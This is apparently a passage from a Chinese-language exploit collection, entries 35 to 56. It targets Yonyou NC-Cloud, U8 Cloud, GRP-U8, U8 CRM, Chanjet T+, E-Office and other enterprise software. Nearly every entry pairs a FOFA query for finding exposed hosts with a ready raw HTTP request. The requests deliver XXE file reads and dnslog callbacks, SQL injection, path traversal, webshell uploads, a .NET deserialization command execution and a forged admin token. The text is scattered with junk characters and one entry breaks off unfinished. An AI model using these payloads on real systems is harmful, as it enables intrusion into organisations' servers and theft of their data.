; w% M9 E: F/ `! f1 E P" _9 EPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.15 _( F* M: v Z1 U! \
Host: 203.25.218.166:8888
1 a; w% K7 ` BUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info1 ~. y _6 G, F5 h, p; A
Accept-Encoding: gzip, deflate
2 D' } n2 a( Z1 O# O" \Accept: */*& ^ x5 [$ \4 F9 T( h3 q
Connection: close
3 @. k8 R; u6 w4 w S) _+ w# CaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA8 D' u: O7 _) y2 Z3 x4 `0 T3 e. `
Content-Length: 190( B1 Q! e' f: Z6 j" ?* n6 ^
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0: v0 Z1 G5 t* A- [
, O. u, L2 F9 X; F. [7 {--fd28cb44e829ed1c197ec3bc71748df0
: c& |) L! l# g" iContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
) `& i: L. i5 _: J( e [! s2 j( z/ b
( D5 d% D( Y/ e( u! _<%out.println(1111*1111);%>& z6 L; I' N: H, |' P. U' T0 X
--fd28cb44e829ed1c197ec3bc71748df0--; ? s( @0 o D$ C* \( i5 N6 E8 Y
/ J- z5 k5 M o6 U* I; {
# P( Z- S* h# K- y8 ~* E) Z36. 用友NC-Cloud soapFormat XXE9 q8 w1 Q+ n+ h
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
- m2 M ? q3 w) n' Y) H4 p7 ^6 sPOST /uapws/soapFormat.ajax HTTP/1.1
1 ]0 |1 a3 N7 i5 \* ]2 u. kHost: 192.168.40.130:8989+ b @9 k5 l4 p) {# q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
/ _5 A' N k3 w, u4 tContent-Length: 2636 v% _ d2 e- \1 \8 ?/ M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( O) u7 ]( F/ J
Accept-Encoding: gzip, deflate
, A4 h( v9 a# S% _1 N( JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& }+ w9 `3 _9 `0 H$ x9 }3 M
Connection: close) a3 T$ J! M/ I5 p# [' B, E. |
Content-Type: application/x-www-form-urlencoded% u5 g ^$ l% d* |# q6 K. K
Upgrade-Insecure-Requests: 1
1 }7 z0 d# W) ^# U: q3 |' F$ f( q5 c8 \1 e4 d. h
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a/ P/ l: g$ n9 z4 J( t1 G. F! R
' J& Q2 J* D( m+ W
5 f4 |) D! E" o0 [. u) C% [37. 用友NC-Cloud IUpdateService XXE3 z, |, S7 k/ a3 C3 f! J& }
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"6 ~: |) w3 s9 A/ x7 ?" G s3 `8 e
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
6 B2 I p2 s4 J3 hHost: 192.168.40.130:8989- t# i. e9 s* o/ Z: s4 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
1 Y0 a7 l- Z! `, _7 o3 DContent-Length: 421
% e; @0 t, r* K6 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1 D+ O T. d. pAccept-Encoding: gzip, deflate2 g/ O3 t+ v, H7 G* J' N
Accept-Language: zh-CN,zh;q=0.9* O# q+ m2 J( J; E# J: {
Connection: close
& @. D1 c6 A0 `$ r3 `' d7 J1 _( ]Content-Type: text/xml;charset=UTF-8, A. J U/ J4 ?( i1 I4 A, p3 r
SOAPAction: urn:getResult. G: w* k G' X- n2 V
Upgrade-Insecure-Requests: 1, t. m# ?! H6 v# U( ]7 o
# Z" ^6 S3 u) K8 U8 \( H- o<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
8 W, |7 n9 `8 _+ I+ d) G6 u<soapenv:Header/>
0 Z) ]- }) e9 m6 Z' u<soapenv:Body>
" {1 p A& E4 A b* C/ Z: h<iup:getResult>
) h; p% N9 @% X5 S' X; x% r<!--type: string-->
+ V& |9 T9 } A. [& D5 D. ~; C<iup:string><![CDATA[1 M7 x/ C# ^: Z: l& n% [
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>7 w- C& E4 A/ V; {' ~
<xxx/>]]></iup:string>: v! L D0 |$ b8 |; r6 C
</iup:getResult>
6 d) E6 f. u8 g& F) ]( c0 \" R</soapenv:Body>
& ~- p( c3 F* x! t, X0 r7 s: l* |4 V/ B</soapenv:Envelope>: r5 ?7 ]5 g3 V% v" H
# f/ P2 l, q2 j4 N
2 I N- Z$ _$ J/ F- |0 [ N8 ?" T) B" j$ p
38. 用友U8 Cloud smartweb2.RPC.d XXE: d& V+ X F- W' [+ U6 V2 t8 ]7 V
FOFA:app="用友-U8-Cloud"# _8 H5 j/ Y% A% R9 b+ V! @1 d
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.12 }6 x2 A$ K6 D, m2 k3 [( g w! q
Host: 192.168.40.131:8088: A W( T9 ?( n8 s5 a* ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.258 t! {! p0 ?2 f0 N1 Q0 W
Content-Length: 2601 f' Z* \& X5 s# }' D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b33 i' K2 C9 o/ t& h2 E
Accept-Encoding: gzip, deflate8 P/ V3 i( F3 v( y
Accept-Language: zh-CN,zh;q=0.9
* d3 _$ o. p: HConnection: close5 a6 ?, R( Y6 c1 }5 r, _5 S4 e
Content-Type: application/x-www-form-urlencoded
$ D$ O `0 S$ y) }" Q2 z& o/ o
4 ?0 S% k" x5 v# e R- `& z__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
2 s# {* h; P! l9 y6 t( W# C3 o9 w$ |: w/ T5 M$ D) s3 P- x/ D" x! ]3 D- j8 r4 V
3 j+ l" Q. M! Z1 @39. 用友U8 Cloud RegisterServlet SQL注入
- ~* S' J8 b; b# y8 I- NFOFA:title="u8c"
: p5 k* W! { N7 J1 DPOST /servlet/RegisterServlet HTTP/1.18 r2 D# X( |1 ?# C
Host: 192.168.86.128:8089
4 R! n/ @, O; sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.369 x a+ n2 S5 x( Q- T
Connection: close% w. X7 |4 h" g7 a1 ]4 e
Content-Length: 85
9 u- M2 f `4 m, U! [* eAccept: */*' M$ I8 F3 s7 K/ j
Accept-Language: en$ p/ l( j; L: Q0 S# [
Content-Type: application/x-www-form-urlencoded I% t' h) }! ]
X-Forwarded-For: 127.0.0.1
/ k* `1 w$ b6 Y7 Z5 \9 e; OAccept-Encoding: gzip
4 g; F" @- d8 ]* |* m7 P
% Q7 ~! c Y; X% Y7 q# rusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--6 S3 p: ~" `2 Z
: x8 U8 {$ i0 r% C# c% }* X
$ n; `6 h6 m% W- x, e% Z40. 用友U8-Cloud XChangeServlet XXE
# Q; U3 x2 L0 }) F3 `FOFA:app="用友-U8-Cloud"3 j& H/ {+ P& J9 H7 j
POST /service/XChangeServlet HTTP/1.1" i3 L. H6 H' T, n! y; o: D
Host: x.x.x.x
. I) V) F$ d: {$ g4 S% j: eUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) b# V6 P8 m8 P- d) W3 o7 Q! OContent-Type: text/xml
3 J" y) ] ~% A" eConnection: close
4 I2 t% n4 G6 e3 g. }# b6 A- c. g. _* t3 e: i$ Z- y0 U
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>1 q$ \1 d7 F1 d' |1 L" ?: |% u/ D
- D2 e' ~9 |) b
5 T, W0 n* o1 }6 t1 H) @
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
) N! ?0 C: y6 G& m* J- _FOFA:app="用友-U8-Cloud", k+ J: T( s% w- E1 e, g4 g
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1. S% Q. o) l3 s! w8 Z
Host:' I" R) D/ Y4 j$ T7 o. V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- a9 |) _. z) }9 P
Content-Type: application/json
, j9 l) X: |9 K* a2 o+ S+ HAccept-Encoding: gzip
O m. K# J i- G) a4 N* WConnection: close
q/ }2 U9 o" v- x+ B8 J
6 z. F& t& y' M6 n- j5 N9 T, ?; ~) ~3 }; Y, P
42. 用友GRP-U8 SmartUpload01 文件上传
! {9 | w( E k. uFOFA:app="用友-GRP-U8"" M G& j9 @$ S) d: {$ x8 l
POST /u8qx/SmartUpload01.jsp HTTP/1.1
. M- V2 H: ?8 [. K8 A) z& iHost: x.x.x.x! @ Z( R1 g1 w- a1 J: _! f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt7 c+ ^$ e0 e) t; k2 o: e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36( k- H0 n4 @; X% h7 e+ v
# _. B* p$ U5 L9 X
PAYLOAD
0 I d4 C. V) _3 }4 T7 g3 q7 S/ U9 ]3 n5 v- B1 s; a
: ]" |& O# ~% e d6 p `6 ohttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
3 |8 E `" ?. j! t7 g1 k' Y3 M6 w
1 z. m: y" Y/ O43. 用友GRP-U8 userInfoWeb SQL注入致RCE
3 v3 r& |% x& @5 J8 m$ MFOFA:app="用友-GRP-U8"5 V" y7 e! L2 h0 Q. s
POST /services/userInfoWeb HTTP/1.1: j* f: \5 L G" [4 i# H: s8 A
Host: your-ip9 H' X$ G: P. o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 U6 `) Y) r7 g8 O h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 r Q: F# v, C3 y1 v [
Accept-Encoding: gzip, deflate
2 q4 [. E) O8 m# T s& EAccept-Language: zh-CN,zh;q=0.9& X3 n4 i% z% C1 ]/ A: B0 `3 L5 C
Connection: close) N7 I5 k9 H- Z% l. x+ F4 d
SOAPAction:
: E6 B4 t( n$ C c+ T2 Q9 |Content-Type: text/xml;charset=UTF-8/ I: m" @9 n$ p- h! @4 @5 h8 o
8 R( C* J$ @0 m5 V) @
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">, b( [/ E* |+ a# h2 Z2 Y) S" J
<soapenv:Header/>
, ~$ O' g' v9 I( @/ e0 D: { <soapenv:Body>* ~( F& D/ v0 @6 r# Q3 W
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
" p5 S/ d; ~! D' O4 p3 _/ e <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>" P( A3 y7 v' S: | J+ \
</ser:getUserNameById>2 d5 C/ z# v6 T m# Q, w
</soapenv:Body>6 Z1 y& Y- b9 d, b5 p% k2 K
</soapenv:Envelope>
5 {- ?% z7 Z2 T! J
) Q) R+ e. o$ I9 c ]! s* r, x9 q7 O
44. 用友GRP-U8 bx_dj_check.jsp SQL注入2 v: I' y- v! F3 r: n- z
FOFA:app="用友-GRP-U8"& Q0 f* U9 c5 ]+ j: L# c
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1* }/ z% u' y' _+ S' _
Host: your-ip2 V; s* @; V9 W; B0 A& j6 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
. G' C4 U* ^3 f3 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 V# P! ^( e' y; ~ C& t/ vAccept-Encoding: gzip, deflate
A& G5 P, C4 W- LAccept-Language: zh-CN,zh;q=0.9) x& x3 ?2 l) c! O, k
Connection: close! j( U$ K3 u7 n2 X; E1 M
" n8 X4 d2 }! c' P. e8 {
R9 Y+ H1 y# ~, [5 k45. 用友GRP-U8 ufgovbank XXE
( h6 H; a( H" x; S& _FOFA:app="用友-GRP-U8"
/ N, g6 k2 a4 LPOST /ufgovbank HTTP/1.10 |/ ?8 v4 W1 }3 v) [1 d
Host: 192.168.40.130:222" ~& L8 }0 ~0 |+ V: R% }4 u& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0! \% H: U( z) C" v5 ?/ J
Connection: close
* h- D8 x4 |; ZContent-Length: 161/ J; Y: ?/ \1 R- t \) U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 b1 s* w' H% ?) a: N( g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ?1 N: {" s4 m" S' D( kContent-Type: application/x-www-form-urlencoded
; m0 ~9 ?0 O) }1 y0 y% dAccept-Encoding: gzip
, `4 J" g0 H' s4 @ O
! F' d1 Q3 Y, i& L! XreqData=<?xml version="1.0"?>
+ J$ ]0 E7 U0 @. N! |<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
/ V, b! c1 v$ q2 E' I/ U5 _* C2 c5 b% x2 z/ L$ r
2 P* c6 U+ u1 f2 p1 F: X46. 用友GRP-U8 sqcxIndex.jsp SQL注入
; J2 m& b' Y O( S4 r: H- ~$ \; n$ LFOFA:app="用友-GRP-U8"
& O; t" K( {. S5 N I1 _% j6 n* _GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1* u: K) t+ P- G7 B1 Q) c
Host: your-ip
: q$ Q, Z$ Z5 Q5 _" ~6 j( \. o7 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.366 p& H+ F& v/ F' n3 y/ `7 E% J7 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 z5 ~+ R0 @& HAccept-Encoding: gzip, deflate9 q9 n* M* _- C$ s# V0 n* _; f
Accept-Language: zh-CN,zh;q=0.9
D' J# g* E% G4 o9 n7 sConnection: close
- q# [6 x2 q A/ z0 ?( n* D7 I! A* D9 l6 N7 |
# Q9 c% C) R# n
47. 用友GRP A++Cloud 政府财务云 任意文件读取
: @9 E( [4 B! O# Q3 v1 D4 PFOFA:body="/pf/portal/login/css/fonts/style.css". ~7 |1 h4 ?# Q t* W
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
. }" x: v' @% K- vHost: x.x.x.x: k& M+ n+ F, d' m" G
Cache-Control: max-age=0
; I. A( z: b: o0 XUpgrade-Insecure-Requests: 11 u' D; d6 o2 n O% i8 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 Q5 a+ A2 @9 W$ L0 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& y- I% P; W& p& \2 \
Accept-Encoding: gzip, deflate, br2 k2 K6 ]/ D# Z" C9 B' M
Accept-Language: zh-CN,zh;q=0.9
+ T$ N7 ?" E2 l2 ^/ R: C1 \If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT' ^9 K) ^7 z, a
Connection: close
5 G# X- x" l* b2 @- O5 e6 B
- {. n7 \. a9 \) U+ o8 U, i8 U: q
( t( V* x+ X$ c1 M. D# U5 j P0 A
48. 用友U8 CRM swfupload 任意文件上传! A5 J1 k: ?1 O: b
FOFA:title="用友U8CRM"3 a7 l; o! f/ F( r8 u1 h& f
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
+ ] e' _! C# ]( e/ g0 [; yHost: your-ip
' [, P0 F0 c1 v% X4 P& e. K- DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* f3 K; h# a& }& @5 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
D4 I' j6 e& J4 D. Q2 S+ ^8 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 x* V' I" H6 O3 \ K
Accept-Encoding: gzip, deflate
8 A& I. \; _5 r9 _9 ~Content-Type: multipart/form-data;boundary=----269520967239406871642430066855" [$ z3 o2 M5 g! Z$ o, n
------269520967239406871642430066855
. f' F, K; U( b' X/ UContent-Disposition: form-data; name="file"; filename="s.php". [8 H, M. q( g
1231' z; E. N& W* p! v- P4 o
Content-Type: application/octet-stream6 W1 V @' j q: `! ?( J7 u
------269520967239406871642430066855
# Z6 E4 b; z' R+ NContent-Disposition: form-data; name="upload"4 r# N; w& e# U7 W
upload
& ^$ m6 t+ N9 z; w: R------269520967239406871642430066855--
9 U) g" h( e- @$ O+ ~) [- ^2 P3 B
# [# h: U2 I1 i* D
! T9 |3 m H: S49. 用友U8 CRM系统uploadfile.php接口任意文件上传: M/ ~+ i' C5 E5 G
FOFA:body="用友U8CRM"! M' e( a" Y: R- X( x: _4 A( u
: n6 x2 c% ^& r- U- WPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1) |( _( c5 x" f
Host: x.x.x.x7 N6 k# V2 | Q+ E- F% x' f/ {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
" X1 u6 D! V. `, y5 d1 EContent-Length: 329/ V6 M9 k& F7 t$ U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 K9 ^' _2 S+ s7 o
Accept-Encoding: gzip, deflate! m; b9 N$ a" O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 u( J! Y$ j7 Z" X0 R" W) A% \
Connection: close
6 D1 C& j' E6 D# p6 xContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w9 }, q! l2 M O+ V6 b9 y2 r
8 p4 C5 E2 [4 m/ C( a1 i
-----------------------------vvv3wdayqv3yppdxvn3w$ `0 T# p* @) x
Content-Disposition: form-data; name="file"; filename="%s.php "
5 W* s7 ^& F% H- s8 kContent-Type: application/octet-stream) i0 X1 c' K2 e; g: u/ O* ^) a; ?
# c% l" {+ f# F6 r' b/ D. o) r
wersqqmlumloqa
- z3 A/ x4 p `& O: Y$ d! \-----------------------------vvv3wdayqv3yppdxvn3w [- R/ z+ M$ q( B; n4 t0 k5 ~ V
Content-Disposition: form-data; name="upload"
" V1 C. M1 q. b
9 G& i/ C# G: Q" X3 V1 G# pupload
) H4 ]: N+ K6 `% M! }5 s* A-----------------------------vvv3wdayqv3yppdxvn3w--9 a ]- w. b0 P8 r
( e/ a1 N0 u) [4 j% H
' s# u9 V& i! `$ H5 P
http://x.x.x.x/tmpfile/updB3CB.tmp.php
r# F2 H2 Z, W/ _3 T4 W A2 s q. m9 c7 g9 d
50. QDocs Smart School 6.4.1 filterRecords SQL注入* I; g, S0 W7 U y: p6 D+ s/ R
FOFA:body="close closebtnmodal"- t) _, L* F- i. i. s5 c u
POST /course/filterRecords/ HTTP/1.1. q+ u, ^4 H: O M, v
Host: x.x.x.x0 l1 g7 g& O3 i! h8 Z# [
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! H) }, g# [2 ^) g: R7 ]Connection: close7 Q5 V, T! k. u
Content-Length: 2248 o0 O4 x& K, T" m! Z* t
Accept: */*! f& B5 m0 @" W8 C& V( \% W
Accept-Language: en
" L' y" G2 [: J# t3 UContent-Type: application/x-www-form-urlencoded* k: F1 t0 l4 C" I! R! T
Accept-Encoding: gzip6 Q$ h m1 y) f) i$ e/ L
5 ?, V$ w3 s* ^+ s2 x- F/ h
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
! j3 s9 a: { Y, P. E, k
5 O, V* t" ~6 @. O* g' c
P2 H6 p- h+ c! p: L51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
. B2 z0 e( n2 `" tFOFA:app="云时空社会化商业ERP系统"
/ K, P: j" ~) f2 g' ?GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
1 g K% o5 ~. a2 e0 T6 `Host: your-ip
( A- f1 h, p$ r8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36/ z' x% X; m! D8 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 D+ W3 C1 p( {. p W, x# X' XAccept-Encoding: gzip, deflate$ _" b! }# p" s! ]- [/ T: n8 E
Accept-Language: zh-CN,zh;q=0.9
1 k' p j( H; p& K/ s! j; r* xConnection: close
) y [; n0 M1 T! k/ F
' y2 |* V5 {! x/ {) s9 ]1 |$ g9 B) F! D7 ^
52. 泛微E-Office json_common.php sql注入
0 N' P/ ~- O. J' d0 t, P6 t* BFOFA:app="泛微-EOffice"
v5 f0 }8 [8 D _1 ~ OPOST /building/json_common.php HTTP/1.1) p; u- q. n2 i2 G
Host: 192.168.86.128:8097! V4 `" Q( I# L1 Q$ X( R" ^
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 Q1 P% r+ K. x5 Q+ H2 {Connection: close4 j5 V2 y. t3 Y
Content-Length: 879 _" L1 n% C+ ]. V5 v
Accept: */*
: B4 R }" w4 R& nAccept-Language: en" }4 L. w% {* y. f" i
Content-Type: application/x-www-form-urlencoded
. p* x2 T( g F0 W- {Accept-Encoding: gzip! f8 \. i, L: r
- X8 z8 L" ~: ~, F) ]* o+ gtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
2 P: Z V% \" f- ?+ | V- f# q! s* B7 ]8 k4 l
" h( L5 Y7 u. ^+ j53. 迪普 DPTech VPN Service 任意文件上传, R0 B+ s3 T: @' n8 ?; C
FOFA:app="DPtech-SSLVPN"
c: p2 J( s1 E w1 O9 `/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
! h9 e) ~0 i d* R" I0 C; r" O" |- `
+ I0 @3 s2 c5 n: {' [
54. 畅捷通T+ getstorewarehousebystore 远程代码执行) y) A0 G8 ^3 N5 q6 W0 q" X# H
FOFA:app="畅捷通-TPlus") q0 ^0 U; |- I1 l
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
$ e* X/ M9 b% X; @/ N) ~ F"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
) H2 I5 }# [8 U9 s5 i
, t7 |4 m" e& s Q d _% B
; z) Q- M+ `4 C: ^: `: {9 ?完整数据包1 z9 t* y8 x* F" M. S, D
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
* O3 d; a( t2 f' WHost: x.x.x.x3 l4 p' [# g: O7 m$ O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F( u% ~+ a: Y5 o& w0 _# Y. l2 v
Content-Length: 593. A2 W9 O" |4 g( Z' D/ y- v
' u& w( p, ~/ Y6 K a6 k4 K$ k- I{' p! k8 B c; k- j% N# G3 @
"storeID":{% s: D/ c8 `* W* `! y4 Q! h
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
" I. A" x* G- R% ~# c, M/ t. u3 [ "MethodName":"Start",; I, Z0 F6 H1 Z$ p, ~4 ]
"ObjectInstance":{
+ m7 O( Q' f* u. U% Z "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. \& Z: s+ }6 Q* e9 Z- }* Y b
"StartInfo":{
- j. `! Z. L0 `9 F, V+ `1 B "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",5 X' f5 W) v7 P* }9 Z' K
"FileName":"cmd",
/ B- }! p8 U' {& d7 F" }" [$ \2 [ "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"$ C' ?* Z) o) O ?/ ^6 H
}1 v! V' x1 A. L5 d
}
9 }/ V" b/ M; Q$ K& Z- a }- }# L" c- T4 D6 a5 d: J8 W
}" b7 E6 V' P0 t% c8 k0 @) q
5 s3 s5 i3 t; I: p: \: c& i( z
2 x. z. { w. r
第二步,访问如下url5 [+ j( B7 ^- ]6 Y* f$ r: l/ a0 d' f
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
: [! s+ S1 p9 N- a# _, L
1 P) P% q7 y% X( P3 D n
3 x+ k3 g" F% u; j4 D9 P. t7 q55. 畅捷通T+ getdecallusers信息泄露
! u' G; x% L$ Y, Q* ~0 |( R; ?FOFA:app="畅捷通-TPlus"
1 f- X6 ~: p+ X* V4 S9 D第一步,通过
$ F- S: |" @" z0 |& `) Z: g1 y/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie+ u" Z! j9 K5 N, o2 n! A, v) F
第二步,利用获取到的Cookie请求
$ b0 r" C6 R2 n9 ?. n8 B1 }7 L/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
2 G) U4 |6 `8 `& ?9 _5 m6 O+ ]! M8 J* b+ k- {
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
7 l6 m2 q$ O& b8 j, E, f! D8 VFOFA: app="畅捷通-TPlus"2 A( d# P# \' P: [- r$ ]
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
